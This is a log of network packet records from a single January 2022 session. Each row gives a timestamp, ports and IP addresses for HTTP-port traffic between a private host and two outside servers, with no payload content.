Jan 9, 2022 18:48:38.127193928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127223969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127279043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127330065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127367973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127382040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127423048 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127434015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127485991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127510071 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127538919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127588034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127589941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127640963 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127676964 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127691984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127742052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127793074 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127794981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127846003 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127877951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.127898932 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127950907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.127976894 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128001928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128058910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128077030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128120899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128201962 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128339052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128451109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128499985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128535032 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128551960 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128597975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128632069 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128653049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128700972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128731012 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128752947 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128804922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128835917 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128886938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128938913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.128973007 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.128988981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129039049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129070997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129090071 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129141092 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129174948 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129192114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129241943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129276991 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129291058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129339933 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129374981 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129432917 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129482031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129515886 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129533052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129582882 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129607916 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129657030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129707098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129740953 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129795074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129853010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129878044 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.129901886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.129976034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.153112888 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.328223944 CET	80	49856	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:38.328427076 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.328515053 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.328658104 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.390259981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390405893 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390479088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390484095 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.390530109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390582085 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.390583992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390635967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390682936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.390686035 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390738964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390789986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390794992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.390831947 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390860081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390888929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390933037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.390983105 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391021967 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391033888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391036034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391086102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391132116 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391136885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391187906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391235113 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391238928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391290903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391336918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391340971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391387939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391433954 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.391443968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391496897 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391535997 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.391541958 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392028093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392080069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392096996 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392131090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392179012 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392179966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392230034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392272949 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392278910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392328978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392375946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392378092 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392426968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392471075 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392474890 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392527103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392570972 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392575026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392625093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392672062 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392673969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392723083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392767906 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392771959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392823935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392870903 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.392915010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.392966032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393012047 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.393014908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393064976 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393111944 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.393114090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393165112 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393213987 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.393214941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393260002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.393309116 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.503616095 CET	80	49856	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:38.503668070 CET	80	49856	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:38.632818937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.653779030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.653856039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.653863907 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.653908968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.653960943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.653961897 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654011965 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654059887 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654062986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654120922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654172897 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654175043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654227018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654272079 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654277086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654328108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654377937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654390097 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654428005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654479027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654484034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654530048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654577017 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654580116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654630899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654675007 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654681921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654733896 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654778004 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.654824018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.654990911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655040026 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655186892 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655236959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655282974 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655286074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655334949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655378103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655383110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655432940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655474901 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655481100 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655530930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655574083 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655580044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655628920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655673027 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655678034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655725956 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655771017 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655776024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655837059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655884027 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655886889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655936956 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.655978918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.655986071 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656034946 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656076908 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.656083107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656132936 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656177998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.656181097 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656230927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656275034 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.656280041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656330109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656373024 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.656379938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656430006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656466961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656480074 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.656517982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656557083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.656562090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.704452038 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.901223898 CET	80	49856	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:38.901423931 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.901746035 CET	49856	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:38.915957928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916044950 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916101933 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916392088 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916443110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916486979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916491985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916542053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916584015 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916591883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916641951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916688919 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916690111 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916739941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916784048 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916789055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916841030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916887999 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.916919947 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.916970968 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917013884 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917020082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917068958 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917113066 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917117119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917165995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917207003 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917215109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917264938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917305946 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917313099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917363882 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917404890 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917412043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917460918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917503119 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917504072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917766094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917814970 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917840004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917891026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917933941 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.917941093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.917992115 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918035030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918041945 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918092966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918135881 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918143034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918194056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918235064 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918243885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918294907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918338060 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918344975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918395042 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918441057 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918445110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918495893 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918540001 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918546915 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918597937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918641090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918648005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918699026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918740988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918749094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918801069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918842077 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.918853998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918900967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.918942928 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.919845104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.919898987 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.919941902 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.919949055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920000076 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920043945 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920049906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920100927 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920144081 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920150995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920202017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920244932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920250893 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920301914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920345068 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920351982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920403004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920445919 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920453072 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920502901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920547962 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920552969 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920603991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920649052 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920654058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920705080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920754910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920754910 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920845985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920911074 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.920918941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.920969963 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.921017885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.921020031 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:38.921066999 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:38.921109915 CET	80	49854	211.169.6.249	192.168.2.3
